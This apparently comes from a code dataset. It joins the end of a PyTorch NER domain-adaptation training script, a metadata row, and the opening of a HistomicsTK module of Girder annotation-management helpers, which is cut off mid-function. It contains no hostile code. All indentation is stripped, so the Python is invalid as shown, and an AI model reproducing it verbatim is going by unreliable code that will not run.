def compute_metrics():
results = metric.compute()
if args.return_entity_level_metrics:
# Unpack nested dictionaries
final_results = {}
for key, value in results.items():
if isinstance(value, dict):
for n, v in value.items():
final_results[f"{key}_{n}"] = v
else:
final_results[key] = value
return final_results
else:
return {
"precision": results["overall_precision"],
"recall": results["overall_recall"],
"f1": results["overall_f1"],
"accuracy": results["overall_accuracy"],
}
# Load pre-trained model and tokenizer
config = AutoConfig.from_pretrained(args.model_name_or_path, num_labels=num_labels)
tokenizer_name_or_path = args.tokenizer_name if args.tokenizer_name else args.model_name_or_path
if config.model_type in {"gpt2", "roberta"}:
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name_or_path, use_fast=True, add_prefix_space=True)
else:
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name_or_path, use_fast=True)
model = AutoModelForTokenClassification.from_pretrained(args.model_name_or_path, config=config)
model.to(args.device)
# Tokenize the source domain dataset
train_dataset_source, eval_dataset_source = tokenize_raw_dataset(
tokenizer=tokenizer,
raw_datasets=raw_datasets,
label_list=label_list,
label_to_id=label_to_id,
text_column_name=text_column_name,
label_column_name=label_column_name,
pad_to_max_length=args.pad_to_max_length,
max_length=args.max_length,
label_all_tokens=args.label_all_tokens,
)
# DataLoaders creation:
if args.pad_to_max_length:
# If padding was already done ot max length, we use the default data collator that will just convert everything
# to tensors.
data_collator = default_data_collator
else:
# Otherwise, `DataCollatorForTokenClassification` will apply dynamic padding for us (by padding to the maximum length of
# the samples passed).
data_collator = DataCollatorForTokenClassification(tokenizer)
train_dataloader_source = DataLoader(train_dataset_source, shuffle=True, collate_fn=data_collator, batch_size=args.train_batch_size_per_domain)
eval_dataloader_source = DataLoader(eval_dataset_source, collate_fn=data_collator, batch_size=args.eval_batch_size)
# Get, tokenize, and create DataLoaders for target domain datasets
train_dataloader_target = None
eval_dataloader_target = None
if any([x is not None for x in [args.dataset_name_target, args.train_file_target, args.evaluation_file_target]]):
train_dataset_target, eval_dataset_target = tokenize_raw_dataset(
tokenizer,
*load_raw_dataset(
dataset_name=args.dataset_name_target,
dataset_config_name=args.dataset_config_name_target,
train_file=args.train_file_target,
evaluation_file=args.evaluation_file_target,
text_column_name=args.text_column_name_target,
label_column_name=args.label_column_name_target,
task_name=args.task_name,
),
pad_to_max_length=args.pad_to_max_length,
max_length=args.max_length,
label_all_tokens=args.label_all_tokens,
)
train_dataloader_target = DataLoader(
train_dataset_target, shuffle=True, collate_fn=data_collator, batch_size=args.train_batch_size_per_domain
)
eval_dataloader_target = DataLoader(eval_dataset_target, collate_fn=data_collator, batch_size=args.eval_batch_size)
# Optimizer
# Split weights in two groups, one with weight decay and the other not.
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
'lr': args.lr,
}, {
"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
'lr': args.lr,
}
]
optimizer = AdamW(optimizer_grouped_parameters)
# Scheduler and math around the number of training steps.
num_update_steps_per_epoch = int(np.ceil(len(train_dataloader_source) / args.grad_accumulation_steps))
if args.num_train_steps is None:
args.num_train_steps = args.num_train_epochs * num_update_steps_per_epoch
else:
args.num_train_epochs = int(np.ceil(args.num_train_steps / num_update_steps_per_epoch))
lr_scheduler = get_scheduler(
name=args.lr_scheduler_type,
optimizer=optimizer,
num_warmup_steps=int(np.ceil(args.num_train_steps*args.warmup_ratio)),
num_training_steps=args.num_train_steps,
)
# Create domain adversary, and its optimizer
model_ad = None
im_weights_estimator = None
optimizer_ad = None
if args.domain_alignment:
feature_size = model.config.hidden_size
if args.use_cdan_features:
# In CDAN, discriminator feature is kronecker product of model feature output and softmax output
feature_size *= num_labels
im_weights = None
source_class_dist = get_class_dist(train_dataset_source, num_labels).type(torch.float32)
if args.use_im_weights and not args.estimate_im_weights:
# Class-importance-weighted domain adaptation with oracle IW
if args.target_class_dist is not None:
# Importance weights are provided by the user (oracle)
target_class_dist = torch.tensor(args.target_class_dist)
else:
# Target class distribution not provided; get from labeled target dataset (for evaluating IWDA-oracle)
target_class_dist = get_class_dist(train_dataset_target, num_labels)
im_weights = target_class_dist/source_class_dist
if args.domain_alignment_loss == 'w1':
model_ad = domain_alignment.W1CriticWithImWeights(feature_size, args.hidden_size_adversary, im_weights=im_weights)
elif args.domain_alignment_loss == 'jsd':
model_ad = domain_alignment.JSDAdversaryWithImWeights(feature_size, args.hidden_size_adversary, im_weights=im_weights)
elif args.domain_alignment_loss == 'mmd':
model_ad = domain_alignment.MMDWithImWeights(im_weights=im_weights, kernel_mul=args.mmd_kernel_mul, kernel_num=args.mmd_kernel_num, fix_sigma=args.mmd_fix_sigma)
model_ad.to(args.device)
if args.use_im_weights and args.estimate_im_weights:
# Class-importance-weighted domain adaptation with IW estimated on-the-fly
im_weights_init = None
if args.alpha_im_weights_init > 0:
# Initialize importance weights from model output on training datasets
im_weights_estimator = domain_alignment.ImWeightsEstimator(num_labels, source_class_dist, hard_confusion_mtx=args.hard_confusion_mtx, confusion_mtx_agg_mode='mean')
im_weights_estimator.to(args.device)
# Iterate over the training datasets, and feed model outputs to IW estimator
model.eval()
for is_target_dom, dataloader in enumerate([train_dataloader_source, train_dataloader_target]):
for step, batch in enumerate(dataloader):
with torch.no_grad():
# See main training loop for comments
batch = {k: v.to(args.device) for k, v in batch.items()}
outputs = model(**batch)
active_indices = torch.div((batch['labels']+100),100,rounding_mode='trunc') == 1
y_true = None if is_target_dom else flatten_outputs(~active_indices, batch['labels'])
y_proba = torch.nn.functional.softmax(flatten_outputs(~active_indices, outputs.logits), dim=-1)
# Collect statistics for importance weights estimation
im_weights_estimator(y_true=y_true, y_proba=y_proba, is_target_dom=is_target_dom)
# Limit num of training samples used to estimate importance weights
if args.max_samples_im_weights_init is not None and step+1 >= args.max_samples_im_weights_init:
break
# Get regularized importance weights
im_weights_init = im_weights_estimator.update_im_weights_qp() * args.alpha_im_weights_init + (1-args.alpha_im_weights_init)
im_weights_estimator = domain_alignment.ImWeightsEstimator(num_labels, source_class_dist, im_weights_init=im_weights_init.detach().cpu(), hard_confusion_mtx=args.hard_confusion_mtx)
im_weights_estimator.to(args.device)
model_ad.get_im_weights = im_weights_estimator.get_im_weights
optimizer_ad_grouped_parameters = []
if args.domain_alignment_loss in ['w1','jsd']:
optimizer_ad_grouped_parameters.extend([
{
"params": [p for n, p in model_ad.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay_adversary,
'lr': args.lr_adversary,
}, {
"params": [p for n, p in model_ad.named_parameters() if any(nd in n for nd in no_decay)],
"weight_decay": 0.0,
'lr': args.lr_adversary,
}
])
if im_weights_estimator is not None:
optimizer_ad_grouped_parameters.extend([
{
"params": [p for n, p in im_weights_estimator.named_parameters()],
"weight_decay": args.weight_decay_im_weights,
'lr': args.lr_im_weights,
}
])
if optimizer_ad_grouped_parameters:
optimizer_ad = AdamW(optimizer_ad_grouped_parameters)
# Train!
total_batch_size = args.train_batch_size_per_domain * args.grad_accumulation_steps
logger.info(f"Run arguments: {vars(args)}")
logger.info("***** Running training *****")
logger.info(f" Num examples source = {len(train_dataset_source)}")
if train_dataloader_target is not None:
logger.info(f" Num examples target = {len(train_dataset_target)}")
logger.info(f" Num Epochs = {args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {args.train_batch_size_per_domain}")
logger.info(f" Total train batch size (w. accumulation) = {total_batch_size}")
logger.info(f" Gradient Accumulation steps = {args.grad_accumulation_steps}")
logger.info(f" Total optimization steps = {args.num_train_steps}")
if args.domain_alignment and args.use_im_weights:
target_class_dist_estimate = [float("{0:0.4f}".format(i)) for i in (source_class_dist * model_ad.get_im_weights().detach().cpu()).numpy()]
logger.info(f" Estimated target class distribution (init) = {target_class_dist_estimate}")
# Only show the progress bar once on each machine.
progress_bar = tqdm(range(args.num_train_steps))
completed_steps = 0
train_dataloaders = (train_dataloader_source,) + ((train_dataloader_target,) if train_dataloader_target is not None else ())
eval_dataloaders = (eval_dataloader_source,) + ((eval_dataloader_target,) if eval_dataloader_target is not None else ())
for epoch in range(args.num_train_epochs):
model.train()
iterators = [iter(x) for x in train_dataloaders]
step = 0
while True:
# Get the next batch of data from source and target domains
batches = []
try:
batches.append(next(iterators[0]))
except StopIteration:
break
if len(iterators) > 1:
try:
batches.append(next(iterators[1]))
except StopIteration:
iterators[1] = iter(train_dataloaders[1])
batches.append(next(iterators[1]))
# Keep the features and labels for domain alignment
features = []
source_dom_labels = None
joint_loss = 0
for is_target_dom, batch in enumerate(batches):
batch = {k: v.to(args.device) for k, v in batch.items()}
# We need `hidden_states` to get features that are used by the linear
# classification head, for domain alignment.
outputs = model(**batch, output_hidden_states=True)
if not is_target_dom:
loss = outputs.loss
loss = loss / args.grad_accumulation_steps
joint_loss += loss
if args.domain_alignment:
# Mask out inputs that are not to be labeled.
#
# This mask should be available to both source and target domain inputs
# from preprocessing (e.g. only first wordpiece of each word is to be
# labeled in most NER implementations).
#
# For our NER experiments, the masked out (non-active) tokens are ones
# with the label -100. See `load_dataset_token_cls.py`.
active_indices = torch.div((batch['labels']+100),100,rounding_mode='trunc') == 1
# Update importance weights statistics and get its loss
y_proba = torch.nn.functional.softmax(flatten_outputs(~active_indices, outputs.logits), dim=-1).detach()
y_true = None if is_target_dom else flatten_outputs(~active_indices, batch['labels'])
if im_weights_estimator is not None:
im_weights_estimator(y_true=y_true, y_proba=y_proba, is_target_dom=is_target_dom, s=args.lr_confusion_mtx)
loss_iw = im_weights_estimator.get_im_weights_loss()
loss_iw = loss_iw / args.grad_accumulation_steps
joint_loss += loss_iw
# Get features for domain alignment
feature = flatten_outputs(~active_indices, outputs.hidden_states[-1])
if args.use_cdan_features:
# CDAN features are kronecker product of model features and output softmax
feature = torch.bmm(y_proba.unsqueeze(2), feature.unsqueeze(1)).view(-1,y_proba.size(1) * feature.size(1))
features.append(feature)
if not is_target_dom:
source_dom_labels = y_true
if args.domain_alignment:
domain_labels = torch.cat([torch.zeros(len(features[0])).long(),torch.ones(len(features[1])).long()]).to(args.device)
features_concat = torch.cat(features, dim=0)
# Gradually ramp up strength of domain alignment
lambda_domain_alignment = args.lambda_domain_alignment
if args.warmup_ratio_domain_alignment > 0:
lambda_domain_alignment *= min(1,completed_steps/(args.num_train_steps*args.warmup_ratio_domain_alignment))
if args.domain_alignment_loss == 'mmd':
lambda_domain_alignment *= -1
features_concat = domain_alignment.GradientReversalLayer(lambda_domain_alignment)(features_concat)
# `alpha` is an importance weights regularizer in early stages of training
alpha_im_weights = 1
if args.warmup_ratio_im_weights > 0:
alpha_im_weights *= min(1,completed_steps/(args.num_train_steps*args.warmup_ratio_im_weights))
loss_ad = model_ad(features_concat, domain_labels, y_true=source_dom_labels, alpha=alpha_im_weights)
loss_ad = loss_ad / args.grad_accumulation_steps
joint_loss += loss_ad
# Compute gradient penalty
if args.domain_alignment_loss != 'mmd' and args.lambda_grad_penalty > 0:
grad_penalty = domain_alignment.calc_gradient_penalty(model_ad.net, *[feature.detach() for feature in features])
grad_penalty = args.lambda_grad_penalty * grad_penalty / args.grad_accumulation_steps
joint_loss += grad_penalty
# Back-propagate the (joint) source classification (and domain alignment) loss
joint_loss.backward()
# Update parameters
if step % args.grad_accumulation_steps == 0 or step == len(train_dataloader_source) - 1:
optimizer.step()
lr_scheduler.step()
optimizer.zero_grad()
if optimizer_ad is not None:
optimizer_ad.step()
optimizer_ad.zero_grad()
progress_bar.update(1)
completed_steps += 1
if completed_steps >= args.num_train_steps:
break
step += 1
model.eval()
eval_metric = {}
for is_target_dom, dataloader in enumerate(eval_dataloaders):
for step, batch in enumerate(dataloader):
batch = {k: v.to(args.device) for k, v in batch.items()}
with torch.no_grad():
outputs = model(**batch)
predictions = outputs.logits.argmax(dim=-1)
labels = batch["labels"]
preds, refs = get_labels(predictions, labels)
metric.add_batch(predictions=preds,references=refs)
this_metric = compute_metrics()
eval_metric.update({k+('/target' if is_target_dom else '/source'):v for k,v in this_metric.items()})
# Print estimated target domain class distribution
if args.domain_alignment and args.use_im_weights and args.estimate_im_weights:
target_class_dist_estimate = [float("{0:0.4f}".format(i)) for i in (source_class_dist * model_ad.get_im_weights().detach().cpu()).numpy()]
eval_metric['target_class_dist_estimate'] = target_class_dist_estimate
logger.info(f"epoch {epoch+1}: {eval_metric}")
if args.output_dir is not None:
model.save_pretrained(args.output_dir)
def parse_args():
parser = argparse.ArgumentParser(description="Finetune a transformers model on a token classification task (NER)")
parser.add_argument("--dataset_name_source", type=str, default=None, help="The name of the dataset to use (via the datasets library). Source domain.")
parser.add_argument("--dataset_config_name_source", type=str, default=None, help="The configuration name of the dataset to use (via the datasets library). Source domain.")
parser.add_argument("--train_file_source", type=str, default=None, help="A csv or a json file containing the training data. Source domain.")
parser.add_argument("--evaluation_file_source", type=str, default=None, help="A csv or a json file containing the evaluation data. Source domain.")
parser.add_argument("--text_column_name_source", type=str, default=None, help="The column name of text to input in the file (a csv or JSON file). Source domain.")
parser.add_argument("--label_column_name_source", type=str, default=None, help="The column name of label to input in the file (a csv or JSON file). Source domain.")
parser.add_argument("--dataset_name_target", type=str, default=None, help="The name of the dataset to use (via the datasets library). Target domain.")
parser.add_argument("--dataset_config_name_target", type=str, default=None, help="The configuration name of the dataset to use (via the datasets library). Target domain.")
parser.add_argument("--train_file_target", type=str, default=None, help="A csv or a json file containing the training data. Target domain.")
parser.add_argument("--evaluation_file_target", type=str, default=None, help="A csv or a json file containing the evaluation data. Target domain.")
parser.add_argument("--text_column_name_target", type=str, default=None, help="The column name of text to input in the file (a csv or JSON file). Target domain.")
parser.add_argument("--label_column_name_target", type=str, default=None, help="The column name of label to input in the file (a csv or JSON file). Target domain.")
parser.add_argument("--task_name", type=str, default="ner", choices=["ner", "pos", "chunk"], help="The name of the task.")
parser.add_argument("--label_all_tokens", action="store_true", help="Setting labels of all special tokens to -100 and thus PyTorch will ignore them.")
parser.add_argument("--return_entity_level_metrics", action="store_true", help="Indication whether entity level metrics are to be returned.")
parser.add_argument("--max_length", type=int, default=512, help="The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded if `--pad_to_max_length` is passed.")
parser.add_argument("--pad_to_max_length", action="store_true", help="If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.")
parser.add_argument("--model_name_or_path", type=str, help="Path to pre-trained model or model identifier from huggingface.co/models.", required=True)
parser.add_argument("--tokenizer_name", type=str, default=None, help="Pre-trained tokenizer name or path if not the same as model_name")
parser.add_argument("--output_dir", type=str, default=None, help="Where to store the final model.")
parser.add_argument("--num_train_epochs", type=int, default=4, help="Total number of training epochs to perform.")
parser.add_argument("--num_train_steps", type=int, default=None, help="Total number of training steps to perform. If provided, overrides num_train_epochs.")
parser.add_argument("--train_batch_size_per_domain", type=int, default=8, help="Batch size (per domain) for the training dataloader.")
parser.add_argument("--eval_batch_size", type=int, default=8, help="Batch size for the evaluation dataloader.")
parser.add_argument("--grad_accumulation_steps", type=int, default=1, help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument("--lr", type=float, default=1e-5, help="Initial learning rate (after the potential warmup period) to use.")
parser.add_argument("--weight_decay", type=float, default=0.01, help="Weight decay to use.")
parser.add_argument("--lr_scheduler_type", type=SchedulerType, default="linear", help="The scheduler type to use.", choices=["linear", "cosine", "cosine_with_restarts", "polynomial", "constant", "constant_with_warmup"])
parser.add_argument("--warmup_ratio", type=float, default=0.1, help="Ratio of training steps for the warmup in the lr scheduler.")
parser.add_argument("--domain_alignment", action="store_true", help="Perform adversarial domain alignment.")
parser.add_argument("--domain_alignment_loss", type=str, default='w1', choices=['w1','jsd','mmd'], help="Loss for domain alignment.")
parser.add_argument("--lambda_domain_alignment", type=float, default=5e-3, help="Strength of the domain alignment.")
parser.add_argument("--warmup_ratio_domain_alignment", type=float, default=0.1, help="Ratio of training steps for warming up the strength of domain alignment.")
parser.add_argument("--use_cdan_features", action="store_true", help="Use CDAN features (Long et al., 2018).")
parser.add_argument("--lr_adversary", type=float, default=5e-4, help="Learning rate of adversary. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--weight_decay_adversary", type=float, default=0.01, help="Weight decay for adversary to use. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--lambda_grad_penalty", type=float, default=10, help="Strength of the gradient penalty. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--hidden_size_adversary", type=int, default=2048, help="Width of adversarial network hidden layer. (Only applicable if `domain_alignment_loss` is `w1` or `jsd`.)")
parser.add_argument("--mmd_kernel_num", type=int, default=5, help="Number of kernels in the MMD layer. (Only applicable if `domain_alignment_loss` is `mmd`.)")
parser.add_argument("--mmd_kernel_mul", type=float, default=2.0, help='Multiplicative factor of kernel bandwidth. (Only applicable if `domain_alignment_loss` is `mmd`.)')
parser.add_argument("--mmd_fix_sigma", type=float, default=None, help="Fix kernel bandwidth, otherwise dynamically adjusted according to l2 distance between pairs of data. (Only applicable if `domain_alignment_loss` is `mmd`.)")
parser.add_argument("--use_im_weights", action="store_true", help="Use class-importance weighting for domain adversary. If not `estimate_im_weights` and `target_class_dist` is not provided then they are inferred from labeled target domain data.")
parser.add_argument("--target_class_dist", type=float, nargs="+", default=None, help="Target domain (training data) class prior distribution.")
parser.add_argument("--estimate_im_weights", action="store_true", help="Estimate class-importance weights.")
parser.add_argument("--lr_im_weights", type=float, default=5e-4, help="Learning rate for importance weights.")
parser.add_argument("--weight_decay_im_weights", type=float, default=2, help="Strength of importance weights ell_2 regularization.")
parser.add_argument("--warmup_ratio_im_weights", type=float, default=0.1, help="Ratio of training steps for reducing the regularization on importance weights, as initial estimates could be inaccurate.")
parser.add_argument("--lr_confusion_mtx", type=float, default=5e-3, help="Learning rate for statistics used to estimate importance weights.")
parser.add_argument("--hard_confusion_mtx", action="store_true", help="Use hard label statistics for estimating importance weights.")
parser.add_argument("--alpha_im_weights_init", type=float, default=0.75, help="If non-zero, replace uniformly initialized importance weights with statistics from pre-trained model by this ratio.")
parser.add_argument("--max_samples_im_weights_init", type=int, default=None, help="Max number of training samples to use for initializing importance weight estimates.")
parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.")
parser.add_argument("--device", type=str, default="cpu", help="Device to train on, e.g. `cpu` or `cuda`.")
parser.add_argument("--disable_tqdm", action="store_true", help="Silence `tqdm` progress bars.")
args = parser.parse_args()
# Sanity checks
if args.task_name is None and args.train_file_source is None and args.evaluation_file_source is None:
raise ValueError("Need either a task name or a training/evaluation file.")
else:
if args.train_file_source is not None:
extension = args.train_file_source.split(".")[-1]
assert extension in ["csv", "json"], "`train_file` should be a csv or a json file."
if args.evaluation_file_source is not None:
extension = args.evaluation_file_source.split(".")[-1]
assert extension in ["csv", "json"], "`evaluation_file` should be a csv or a json file."
return args
if __name__ == "__main__":
main()
| 56.177391
| 250
| 0.674664
|
bf2e05047680922b9006cab4acbaa385f85c5b57
| 17,737
|
py
|
Python
|
histomicstk/utils/girder_convenience_utils.py
|
basanto/HistomicsTK
|
f3dbd93a7f31c7825574f9ccf0b86e09e9fee360
|
[
"Apache-2.0"
] | 3
|
2022-02-23T09:43:53.000Z
|
2022-03-21T22:32:05.000Z
|
histomicstk/utils/girder_convenience_utils.py
|
basanto/HistomicsTK
|
f3dbd93a7f31c7825574f9ccf0b86e09e9fee360
|
[
"Apache-2.0"
] | null | null | null |
histomicstk/utils/girder_convenience_utils.py
|
basanto/HistomicsTK
|
f3dbd93a7f31c7825574f9ccf0b86e09e9fee360
|
[
"Apache-2.0"
] | 3
|
2020-04-22T19:40:18.000Z
|
2021-02-03T07:31:45.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 12 13:19:18 2019
@author: tageldim
"""
# import os
import os
import girder_client
import json
from histomicstk.workflows.workflow_runner import Workflow_runner, \
Slide_iterator, Annotation_iterator
# import warnings
# warnings.simplefilter('once', UserWarning)
def connect_to_api(apiurl, apikey=None, interactive=True):
"""Connect to a specific girder API.
Parameters
----------
apiurl : str
URL to the AP to connect to.
apikey : str
API authentication token key
interactive : bool
Whether to use interactive mode instead.
Returns
-------
girder_client.GirderClient
Authenticated girder client.
"""
assert interactive or (apikey is not None)
gc = girder_client.GirderClient(apiUrl=apiurl)
if apikey is not None:
interactive = False
if interactive:
gc.authenticate(interactive=True)
else:
gc.authenticate(apiKey=apikey)
return gc
def get_absolute_girder_folderpath(gc, folder_id=None, folder_info=None):
"""Get absolute path for a girder folder.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folder_id : str
girder id of folder
folder_info : dict
folder info from the girder server
Returns
-------
str
absolute path to folder in the girder server.
"""
assert any([j is not None for j in (folder_id, folder_info)])
if folder_id is not None:
folder_info = gc.get('/folder/%s' % folder_id)
fpath = gc.get('/folder/%s/rootpath' % folder_info['_id'])
fpath = "/".join([
j['object']['name'] for j in fpath
if j['object']['_modelType'] == 'folder'
]) + "/" + folder_info['name'] + "/"
return fpath
def update_permissions_for_annotation(
gc, annotation_id=None, annotation=None,
groups_to_add=None, replace_original_groups=True,
users_to_add=None, replace_original_users=True):
"""Update permissions for a single annotation.
Parameters
----------
gc : gider_client.GirderClient
authenticated girder client instance
annotation_id : str
girder id of annotation
annotation : dict
overrides annotation_id if given
groups_to_add : list
each entry is a dict containing the information about user groups
to add and their permission levels. A sample entry must have the
following keys
- level, int -> 0 (view), 1 (edit) or 2 (owner)
- name, str -> name of user group
- id, st -> girder id of user group
replace_original_groups : bool
whether to replace original groups or append to them
users_to_add : list
each entry is a dict containing the information about user
to add and their permission levels. A sample entry must have the
following keys
- level, int -> 0 (view), 1 (edit) or 2 (owner)
- login, str -> username of user
- id, st -> girder id of user
replace_original_users
whether to replace original users or append to them
Returns
-------
dict
server response
"""
groups_to_add = [] if groups_to_add is None else groups_to_add
users_to_add = [] if users_to_add is None else users_to_add
if annotation is not None:
annotation_id = annotation['_id']
elif annotation_id is None:
raise Exception(
"You must provide either the annotation or its girder id.")
# get current permissions
current = gc.get('/annotation/%s/access' % annotation_id)
# add or replace as needed
if replace_original_groups:
current['groups'] = []
current_group_ids = []
else:
current_group_ids = [j['id'] for j in current['groups']]
if replace_original_users:
current['users'] = []
current_user_ids = []
else:
current_user_ids = [j['id'] for j in current['users']]
for group in groups_to_add:
if group['id'] not in current_group_ids:
current['groups'].append(group)
for user in users_to_add:
if user['id'] not in current_user_ids:
current['users'].append(user)
# now update accordingly
# BAD WAY!! -- do NOT do this!
# return gc.put('/annotation/%s/access?access=%s' % (
# annotation_id, json.dumps(current)))
# PROPER WAY
return gc.put('/annotation/%s/access' % annotation_id, data={
'access': json.dumps(current)})
def update_permissions_for_annotations_in_slide(
gc, slide_id, verbose=0, monitorPrefix='', **kwargs):
"""Update permissions for all annotations in a slide.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
slide_id : str
girder id of slide
verbose : int
level of verbosity
monitorPrefix : str
prefix to prepend to printed statements
kwargs
passed as-is to update_permissions_for_annotation()
Returns
-------
list
each entry is a dict of the server response.
"""
anniter = Annotation_iterator(
gc=gc, slide_id=slide_id,
callback=update_permissions_for_annotation,
callback_kwargs=kwargs,
verbose=verbose, monitorPrefix=monitorPrefix)
return anniter.apply_callback_to_all_annotations()
def update_permissions_for_annotations_in_folder(
gc, folderid, workflow_kwargs, recursive=True,
monitor='', verbose=True):
"""Update permissions for all annotations in a folder recursively.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folderid : str
girder id of folder
workflow_kwargs : dict
kwargs to pass to update_permissions_for_annotations_in_slide()
recursive : bool
do this recursively for subfolders?
monitor : str
text to prepend to printed statements
verbose : bool
print statements to screen?
Returns
-------
None
"""
# update permissions for each slide in folder
workflow_kwargs.update({'gc': gc})
workflow_runner = Workflow_runner(
slide_iterator=Slide_iterator(
gc, source_folder_id=folderid,
keep_slides=None,
),
workflow=update_permissions_for_annotations_in_slide,
workflow_kwargs=workflow_kwargs,
recursive=recursive,
monitorPrefix=monitor,
verbose=verbose,
)
workflow_runner.run()
def update_styles_for_annotation(gc, annotation, changes):
"""Update styles for all relevant elements in an annotation.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
annotation : dict
annotation
changes : dict
indexed by current group name to be updated, and values are
the new styles. Each element in ann["annotation"]["elements"]
whose current "group" attribute is in this dict's keys is
updated according to the new style.
Returns
-------
dict
server response
"""
# find out if annotation needs editing
if 'groups' not in annotation.keys():
return
elif not any([g in changes.keys() for g in annotation['groups']]):
return
# edit elements one by one
for el in annotation['annotation']['elements']:
if el['group'] in changes.keys():
el.update(changes[el['group']])
# print(" updating ...")
return gc.put(
"/annotation/%s" % annotation['_id'], json=annotation['annotation'])
def update_styles_for_annotations_in_slide(
gc, slide_id, verbose=0, monitorPrefix='', callback=None, **kwargs):
"""Update styles for all annotations in a slide.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
slide_id : str
girder id of slide
verbose : int
level of verbosity
monitorPrefix : str
prefix to prepend to printed statements
callback : function
if None, defaults to update_styles_for_annotation. Passed as-is
to histomicstk.workflows.workflow_runner.Annotation_iterator
kwargs
passed as-is to the update_styles_for_annotation
Returns
-------
list
each entry is a dict of the server response.
"""
if callback is None:
callback = update_styles_for_annotation
anniter = Annotation_iterator(
gc=gc, slide_id=slide_id,
callback=callback,
callback_kwargs=kwargs,
verbose=verbose, monitorPrefix=monitorPrefix)
return anniter.apply_callback_to_all_annotations()
def update_styles_for_annotations_in_folder(
gc, folderid, workflow_kwargs, recursive=True,
catch_exceptions=True, monitor='', verbose=True):
"""Update styles for all annotations in a folder recursively.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folderid : str
girder id of folder
workflow_kwargs : dict
kwargs to pass to Update styles for all annotations in a slide()
recursive : bool
do this recursively for subfolders?
catch_exceptions : bool
passed as-is to histomicstk.workflows.workflow_runner.Workflow_runner
monitor : str
text to prepend to printed statements
verbose : bool
print statements to screen?
Returns
-------
None
"""
# update annotation styles
workflow_kwargs.update({'gc': gc})
workflow_runner = Workflow_runner(
slide_iterator=Slide_iterator(
gc, source_folder_id=folderid,
keep_slides=None,
),
workflow=update_styles_for_annotations_in_slide,
workflow_kwargs=workflow_kwargs,
recursive=recursive,
catch_exceptions=catch_exceptions,
monitorPrefix=monitor,
verbose=verbose,
)
workflow_runner.run()
def revert_annotation(
gc, annotation_id=None, annotation=None, version=None,
revert_to_nonempty_elements=False, only_revert_if_empty=True):
"""Revert an annotation to a previous version.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
annotation_id : str
girder id of annotation
annotation : dict
overrides annotation_id if given
version : int
versoin number for annotation. If None, and
not revert_to_nonempty_elements
the default behavior of the endpoint is evoked, which reverts the
annotation if it was deleted and if not, reverts to the last version.
revert_to_nonempty_elements : bool
if true, reverts to the most recent version of the annotation
with non-empty elements.
only_revert_if_empty : bool
if true, only reverts annotation if it contains an empty element list
Returns
-------
dict
server response
"""
if annotation is not None:
annotation_id = annotation['_id']
elif annotation_id is None:
raise Exception(
"You must provide either the annotation or its girder id.")
history = gc.get("/annotation/%s/history" % annotation_id)
# no need to revert if empty
if only_revert_if_empty and len(history[0]["groups"]) > 0:
return dict()
# cannot revert if only version
if len(history) < 2:
return dict()
if (version is None) and revert_to_nonempty_elements:
# NOTE: even though the "history" may show
# the elements as empty, the "groups" attribute is really the
# indication if the annotation version actually has some elements.
# TODO -- This is likely a bug (?); fix me!!!
for ver in history:
if len(ver["groups"]) > 0:
version = ver['_version']
break
ver = "" if version is None else "?version=%d" % version
# if version is None:
# print(" Reverting ...")
# else:
# print(" Reverting to version %d" % version)
return gc.put("/annotation/%s/history/revert%s" % (annotation_id, ver))
def revert_annotations_in_slide(
gc, slide_id, verbose=0, monitorPrefix='', **kwargs):
"""Revert all annotations in a slide to a previous version.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
slide_id : str
girder id of slide
verbose : int
level of verbosity
monitorPrefix : str
prefix to prepend to printed statements
kwargs
passed as-is to the revert_annotation
Returns
-------
list
each entry is a dict of the server response.
"""
anniter = Annotation_iterator(
gc=gc, slide_id=slide_id,
callback=revert_annotation,
callback_kwargs=kwargs,
verbose=verbose, monitorPrefix=monitorPrefix)
return anniter.apply_callback_to_all_annotations()
def revert_annotations_in_folder(
gc, folderid, workflow_kwargs, recursive=True,
monitor='', verbose=True):
"""Revert all annotations in a folder recursively.
Parameters
----------
gc : girder_client.GirderClient
authenticated girder client
folderid : str
girder id of folder
workflow_kwargs : dict
kwargs to pass to revert_annotations_in_slide
recursive : bool
do this recursively for subfolders?
monitor : str
text to prepend to printed statements
verbose : bool
print statements to screen?
Returns
-------
None
"""
# update annotation styles
workflow_kwargs.update({'gc': gc})
workflow_runner = Workflow_runner(
slide_iterator=Slide_iterator(
gc, source_folder_id=folderid,
keep_slides=None,
),
workflow=revert_annotations_in_slide,
workflow_kwargs=workflow_kwargs,
recursive=recursive,
monitorPrefix=monitor,
verbose=verbose,
)
workflow_runner.run()
# %%===========================================================================
def reproduce_annotations_workflow(
gc, folderid, annotation_jsonfile, monitorPrefix=''):
"""Dump annotations into single slide from local folder.
Parameters
-----------
gc : girder_client.GirderClient
authenticated girder client instance
folderid : str
girder id of girder folder to post reproduced annotations.
annotation_jsonfile : str
path to annotation json file
monitorPrefix : str
prefix to monitor string
"""
try:
# extract name + path
itemname = os.path.basename(annotation_jsonfile).replace(
'_annotations.json', '')
local = os.path.dirname(annotation_jsonfile)
# copy item without annotations
with open(os.path.join(local, itemname + '.json'), 'r') as jf:
source_item_info = json.load(jf)
print("%s: copy item" % monitorPrefix)
item = gc.post(
